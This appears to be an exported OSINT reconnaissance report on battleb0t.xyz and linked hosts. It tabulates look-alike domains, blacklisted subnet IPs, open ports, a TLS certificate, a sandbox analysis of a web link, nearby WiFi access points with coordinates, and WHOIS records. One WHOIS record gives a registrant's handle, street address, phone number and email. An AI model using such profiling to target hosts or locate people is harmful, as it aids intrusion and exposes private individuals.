| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | HB (Net ID: 00:01:36:35:4A:AA) | 34.0544, -118.244 |
| 2023-05-12 03:16:17 | Similar Domain | Yes | Tool - DNSTwist | 1 | 0 | 1 | 0 | None | ashu.xyz | ayhu.xyz |
| 2023-05-12 03:00:56 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.89): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | WEST4541 (Net ID: 00:12:0E:7E:7A:31) | 32.8608, -79.9746 |
| 2023-05-12 02:51:49 | Raw Data from RIRs | No | Hybrid Analysis | 2 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 23, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://click9.bigmarker.com/links/BY79pHvYX2Z/QPJiO7I68/tMwYeVPDKIXG/IN5CQt3PP-?bu=7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff5125d2b050eecdfd56122f5766da81f9380883c6330281152549d890a090250ca7457e3d6af512de37a44ef72cc832a7cff15e41cb02af8a17863d1d3fd8b23804d4f2277ba16828665e73cb7759a78343309ede93ee8fcceaf565cf60789ea78d923ffa76fe3d', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\SM0:2872:304:WilStaging_02"\n "InternetShortcutMutex"\n "Local\\SM0:2872:120:WilError_01"\n "SM0:2872:120:WilError_01"\n "SM0:2872:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.231.70.218:443"\n "138.91.254.96:443"\n "3.235.65.215:443"\n "13.227.21.122:443"\n "185.199.108.153:443"\n "13.227.21.6:443"\n "151.101.0.176:443"\n "142.251.2.156:443"\n "151.101.2.137:443"\n "162.247.241.14:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n "bam.nr-data.net"\n "checkout.stripe.com"\n "click9.bigmarker.com"\n "d1f74no97k6yi9.cloudfront.net"\n "d5ln38p3754yc.cloudfront.net"\n "js-agent.newrelic.com"\n "stats.g.doubleclick.net"\n "webrtc.github.io"\n "www.bigmarker.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string "<meta name="twitter:card" content="summary_large_image">" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")\n Found string "<meta name="twitter:site" content="@bigmarker">" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")\n Found string "<meta name="twitter:creator" content="@bigmarker">" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")\n Found string "<meta name="twitter:title" content="The Inbound Customer Experience">" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")\n Found string "<meta name="twitter:description" content="Our panelists will discuss a variety of questions including:" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512"), Found string "<meta name="twitter:image" content="https://d5ln38p3754yc.cloudfront.net/conference_icons/7821611/large/1677693079-c5b46aaa6c8ef248.jpg?1677693079">" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" writes file "\\device\\namedpipe\\wkssvc"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\last version"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\vpn tokens-journal"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\index"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_0"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_1"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_2"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_3"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\history"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\favicons"'}, {u'category': u'Installation/Persistence', u'origin': u'File/Memory', u'identifier': u'string-396', u'name': u'Contains ability to create/modify Windows services (Powershell command string)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1543/003', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1543.003', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Found string "<div class="registrants-add-contents" style="padding-bottom: 28px">" (Indicator: "Add-Content"; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\636_742791881\\shopping.js]- [targetUID: 00000000-00000636]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00000636]\n "Ruleset Data" has type "da | 185.199.108.153 |
| 2023-05-12 03:09:27 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 1 | 0 | 2 | 0 | None | C=US,ST=California,L=San Francisco,O=Cloudflare\, Inc.,CN=sni.cloudflaressl.com | 188.114.97.1 |
| 2023-05-12 03:01:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.250): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:50:23 | Blacklisted IP Address | Yes | Honeypot Checker | 0 | 1 | 2 | 0 | None | Honeypotproject (104.21.6.166): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 104.21.6.166 |
| 2023-05-12 02:53:56 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 2606:50c0:8001::153:80 | 2606:50c0:8001::153 |
| 2023-05-12 02:57:25 | Internet Name | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | funny.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 0 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/master058_1.PNG | https://funny.battleb0t.xyz/ |
| 2023-05-12 02:45:50 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 2 | 0 | None | {u'city': u'Montreal', u'security': {u'is_vpn': False}, u'city_geoname_id': 6077243, u'region_geoname_id': 6115047, u'country': u'United States', u'region': u'Quebec', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'CLOUDFLARENET', u'isp_name': u'Cloudflare, Inc.', u'organization_name': u'Cloudflare, Inc.', u'autonomous_system_number': 13335}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'H4X', u'longitude': -97.822, u'country_code': u'US', u'timezone': {u'abbreviation': u'CDT', u'gmt_offset': -5, u'is_dst': True, u'name': u'America/Chicago', u'current_time': u'21:45:49'}, u'latitude': 37.751, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'2606:4700:3031::ac43:8709', u'continent': u'North America', u'region_iso_code': u'QC'} | 2606:4700:3031::ac43:8709 |
| 2023-05-12 03:01:17 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.145): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:55:05 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c5b59d17bc80231-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 188.114.97.1 |
| 2023-05-12 02:44:38 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:81:34:2e:fd:61:48:b5:6f:11:ca:36:0b:dc:62:9a:cf:52
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 09:44:02 2022 GMT
Not After : Feb 15 09:44:01 2023 GMT
Subject: CN=vscode.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:eb:b0:96:39:35:d3:30:8a:f5:f9:da:c5:cf:96:
1a:e7:f9:f3:a9:a3:ac:48:a3:a4:b9:37:4c:63:75:
40:36:2d:7f:85:6e:28:b7:ff:1d:a9:b7:7a:9e:a9:
3c:18:2e:aa:60:9b:01:a6:03:71:f5:37:c6:c4:08:
7f:2e:0c:29:9a:02:88:31:a0:12:65:5e:31:21:f1:
5f:d6:97:6e:ea:18:9d:90:ce:ff:12:3b:cb:ae:3a:
f3:b3:33:e6:51:66:ee:77:b1:1e:2d:63:9d:86:29:
e8:e7:da:f5:95:bf:4c:37:58:2b:4b:3b:b3:82:8c:
63:1f:3a:3d:4d:85:c4:0d:2f:dd:0c:39:76:ab:a5:
7c:fc:53:9d:e0:67:9e:f7:6e:00:5d:8f:60:c1:b4:
dd:6b:fb:d3:a5:23:a0:c0:99:85:04:91:d1:e3:63:
1f:33:3f:20:df:22:22:a9:89:b5:26:f8:3b:cf:ec:
a6:2f:0a:b5:ce:e9:fd:d6:cf:3c:d3:6e:35:3e:a2:
cb:0a:4c:43:1f:c2:91:d1:57:92:fc:79:bc:b6:50:
67:72:7f:f2:de:ba:e6:81:c8:81:ad:91:41:c2:41:
68:e4:66:e4:cf:77:e7:8f:ad:4a:dd:cf:21:57:7e:
5c:5b:1a:bf:18:03:99:5a:e7:0b:bf:13:4e:4f:9d:
f8:63:3c:53:43:ba:5c:2b:86:aa:b1:6c:59:33:66:
06:b4:0c:58:5e:eb:57:fb:21:90:64:8e:04:88:5e:
93:71:bc:07:a7:76:0a:39:5b:e9:8a:11:59:0c:e9:
3d:9f:ef:48:1a:15:f1:b6:8d:38:c6:ac:b0:3d:55:
62:fd:ec:ca:10:f7:3e:ad:09:2b:f9:07:39:64:89:
c0:8c:df:58:83:b1:49:a3:6a:de:8d:1d:b0:68:22:
42:05:11:89:f5:28:3d:e2:a8:01:12:cb:7f:55:12:
36:97:26:ba:dd:f2:81:bc:89:38:da:02:ae:fd:90:
99:5d:a3:f5:46:95:ac:11:67:63:06:d1:ab:ad:cc:
15:5b:ae:15:c5:be:e2:e1:4a:b9:58:65:89:ff:47:
b7:6c:bd:4d:78:de:bc:99:4b:30:66:94:63:8c:10:
f1:ba:46:36:e6:f8:37:e7:a4:4a:58:f8:29:e5:40:
29:33:93:f8:de:48:92:4e:5d:bb:50:eb:49:71:90:
ef:b5:9b:2c:bf:b0:19:fb:12:45:a7:b3:2e:45:b4:
1b:cf:46:ab:19:7f:6c:7d:d1:f9:c0:87:cb:fb:3f:
0d:76:c4:c2:98:11:bd:11:fc:93:89:ac:ab:3e:87:
64:67:c1:b8:49:1c:b8:1a:ca:85:02:c8:58:c0:9e:
e2:87:d7
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
A7:55:24:63:5E:86:20:7B:DE:F3:EF:D8:48:33:0B:C7:5C:3F:22:72
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:vscode.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Nov 17 10:44:02.310 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:A0:8D:98:FA:F9:D9:C8:59:5F:87:D3:
BB:68:8E:C2:BB:E7:07:F3:66:F0:BF:C4:32:F7:17:14:
85:A0:6B:D1:81:02:21:00:E1:E7:8A:92:A4:1B:C4:8C:
79:7C:C9:6A:17:B8:C7:84:C4:57:6B:7F:E9:88:F3:FA:
7F:17:65:61:BF:48:50:7D
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Nov 17 10:44:02.268 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:8A:CF:A1:DE:F1:EC:82:39:97:4B:3B:
E7:19:AD:34:CE:C3:F8:D5:48:1A:55:78:09:18:4D:A5:
36:34:CF:46:A1:02:20:77:AE:18:F8:2D:70:F3:32:66:
62:44:0D:F1:40:70:3E:89:21:C3:7B:CF:8C:98:9B:A8:
93:78:E1:26:FD:75:C4
Signature Algorithm: sha256WithRSAEncryption
85:47:39:10:69:02:19:cb:50:8c:08:91:e6:11:b3:5f:9d:fa:
b8:b1:83:e5:ff:e8:1d:ed:c5:00:66:a8:84:ff:8c:00:23:34:
e3:46:98:32:83:6e:3d:e3:58:01:45:e8:a3:86:95:02:4e:5e:
0c:2e:72:f2:22:72:8e:a0:b1:06:5d:d0:13:ed:5c:d8:a1:70:
83:1c:43:aa:b9:57:4d:3c:0c:d8:a7:d4:a3:f6:94:cb:e4:d0:
4b:e5:4b:8f:fc:90:9f:6a:f2:f7:82:9b:08:f2:f3:44:1b:86:
18:89:5e:72:af:ca:a9:09:1e:e2:c5:ae:e1:9c:e5:9c:5e:66:
8e:8b:22:8a:36:54:2a:4e:6a:d6:82:11:53:86:c5:74:e3:90:
90:6f:46:a5:ce:07:f8:45:77:70:d4:77:73:14:c3:71:96:31:
7a:30:09:e0:7b:e0:e8:34:13:61:49:d3:bf:fa:aa:2e:da:45:
5f:25:e3:22:f8:d8:94:10:30:4c:38:a3:69:e5:a9:44:0f:99:
ab:4f:8a:ac:8b:23:68:e6:f5:dc:3a:a2:45:58:75:61:f0:50:
88:14:ff:16:c7:72:ba:24:24:ed:84:3a:6f:d4:e8:8e:26:df:
24:ff:a8:40:5d:67:21:98:6b:ad:ae:da:d7:ae:81:57:3d:a1:
46:7c:24:9a
| battleb0t.xyz |
| 2023-05-12 03:03:39 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 01-scripts.github.io |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | a-zoom (Net ID: 00:01:38:D4:87:A3) | 37.7813933,-122.3918002 |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Content-Security-Policy: default-src 'none'
X-Content-Type-Options: nosniff
Content-Type: text/html; charset=utf-8
Content-Length: 1391
Date: <REDACTED>
Connection: keep-alive
| 87.248.157.102 |
| 2023-05-12 03:31:29 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 5 | 0 | None | d3fc0n6@protonmail.com | Domain Name: RATHOOK.CC
Registry Domain ID: 163793658_DOMAIN_CC-VRSN
Registrar WHOIS Server: whois.porkbun.com
Registrar URL: http://porkbun.com
Updated Date: 2022-09-07T10:53:59Z
Creation Date: 2021-09-13T01:07:39Z
Registry Expiry Date: 2024-09-13T01:07:39Z
Registrar: Porkbun LLC
Registrar IANA ID: 1861
Registrar Abuse Contact Email: abuse@porkbun.com
Registrar Abuse Contact Phone: 5038508351
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: CURITIBA.NS.PORKBUN.COM
Name Server: FORTALEZA.NS.PORKBUN.COM
Name Server: MACEIO.NS.PORKBUN.COM
Name Server: SALVADOR.NS.PORKBUN.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:11:56Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the
expiration date of the domain name registrant's agreement with the
sponsoring registrar. Users may consult the sponsoring registrar's
Whois database to view the registrar's reported date of expiration
for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign's ("VeriSign") Whois
database is provided by VeriSign for information purposes only, and to
assist persons in obtaining information about or related to a domain name
registration record. VeriSign does not guarantee its accuracy.
By submitting a Whois query, you agree to abide by the following terms of
use: You agree that you may use this Data only for lawful purposes and that
under no circumstances will you use this Data to: (1) allow, enable, or
otherwise support the transmission of mass unsolicited, commercial
advertising or solicitations via e-mail, telephone, or facsimile; or
(2) enable high volume, automated, electronic processes that apply to
VeriSign (or its computer systems). The compilation, repackaging,
dissemination or other use of this Data is expressly prohibited without
the prior written consent of VeriSign. You agree not to use electronic
processes that are automated and high-volume to access or query the
Whois database except as reasonably necessary to register domain names
or modify existing registrations. VeriSign reserves the right to restrict
your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
Domain Name: RATHOOK.CC
Registry Domain ID: 163793658_DOMAIN_CC-VRSN
Registrar WHOIS Server: whois.porkbun.com
Registrar URL: http://www.porkbun.com
Updated Date: 2022-01-28 17:32:18
Created Date: 2021-09-13 01:07:39
Registrar Registration Expiration Date: 2024-09-13 01:07:39
Registrar: Porkbun LLC
Registrar IANA ID: 1861
Registrar Abuse Contact Email: abuse@porkbun.com
Registrar Abuse Contact Phone: +1.5038508351
Domain Status: clientTransferProhibited http://icann.org/epp#clientTransferProhibited
Domain Status: clientDeleteProhibited http://icann.org/epp#clientDeleteProhibited
Registry Registrant ID:
Registrant Name: d3f c0n6
Registrant Organization: Boat Rolling Inc
Registrant Street: 10 Voie de l'Excelsior
Registrant City: Val-de-Reuil
Registrant State/Province: Normandy
Registrant Postal Code: 27100
Registrant Country: FR
Registrant Phone: +33:FR.268605683
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: d3fc0n6@protonmail.com
Registry Admin ID:
Admin Name: d3f c0n6
Admin Organization: Boat Rolling Inc
Admin Street: 10 Voie de l'Excelsior
Admin City: Val-de-Reuil
Admin State/Province: Normandy
Admin Postal Code: 27100
Admin Country: FR
Admin Phone: +33:FR.268605683
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: d3fc0n6@protonmail.com
Registry Tech ID:
Tech Name: d3f c0n6
Tech Organization: Boat Rolling Inc
Tech Street: 10 Voie de l'Excelsior
Tech City: Val-de-Reuil
Tech State/Province: Normandy
Tech Postal Code: 27100
Tech Country: FR
Tech Phone: +33:FR.268605683
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: d3fc0n6@protonmail.com
Name Server: curitiba.ns.porkbun.com
Name Server: fortaleza.ns.porkbun.com
Name Server: salvador.ns.porkbun.com
Name Server: maceio.ns.porkbun.com
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net
>>> Last update of WHOIS database: 2022-01-28 17:32:18 <<<
For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
The Data in the Porkbun LLC WHOIS database is provided by Porkbun LLC for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Porkbun LLC does not guarantee its accuracy. By submitting a WHOIS query, you agree that you will use this Data only for lawful purposes and that, under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail (spam); or (2) enable high volume, automated, electronic processes that apply to Porkbun LLC (or its systems). Porkbun LLC reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Porkbun!
|
| 2023-05-12 03:11:12 | Physical Coordinates | No | OpenStreetMap | 77 | 0 | 4 | 0 | None | 33.6170672,-111.90564645297056 | 14455 North Hayden Rd, Scottsdale, US-AZ, US, 85260 |
| 2023-05-12 02:44:17 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2606:50c0:8003::153 | www.battleb0t.xyz |
| 2023-05-12 02:44:15 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Express | nwapi2.battleb0t.xyz |
| 2023-05-12 02:59:44 | Co-Hosted Site - Domain Whois | No | Whois | 1 | 0 | 2 | 0 | None | Domain Name: GITHUBUSERCONTENT.COM
Registry Domain ID: 1845671923_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.markmonitor.com
Registrar URL: http://www.markmonitor.com
Updated Date: 2022-01-05T09:12:39Z
Creation Date: 2014-02-06T21:17:00Z
Registry Expiry Date: 2024-02-06T21:17:00Z
Registrar: MarkMonitor Inc.
Registrar IANA ID: 292
Registrar Abuse Contact Email: abusecomplaints@markmonitor.com
Registrar Abuse Contact Phone: +1.2086851750
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Name Server: DNS1.P01.NSONE.NET
Name Server: DNS2.P01.NSONE.NET
Name Server: DNS3.P01.NSONE.NET
Name Server: DNS4.P01.NSONE.NET
Name Server: NS-1411.AWSDNS-48.ORG
Name Server: NS-181.AWSDNS-22.COM
Name Server: NS-1867.AWSDNS-41.CO.UK
Name Server: NS-596.AWSDNS-10.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
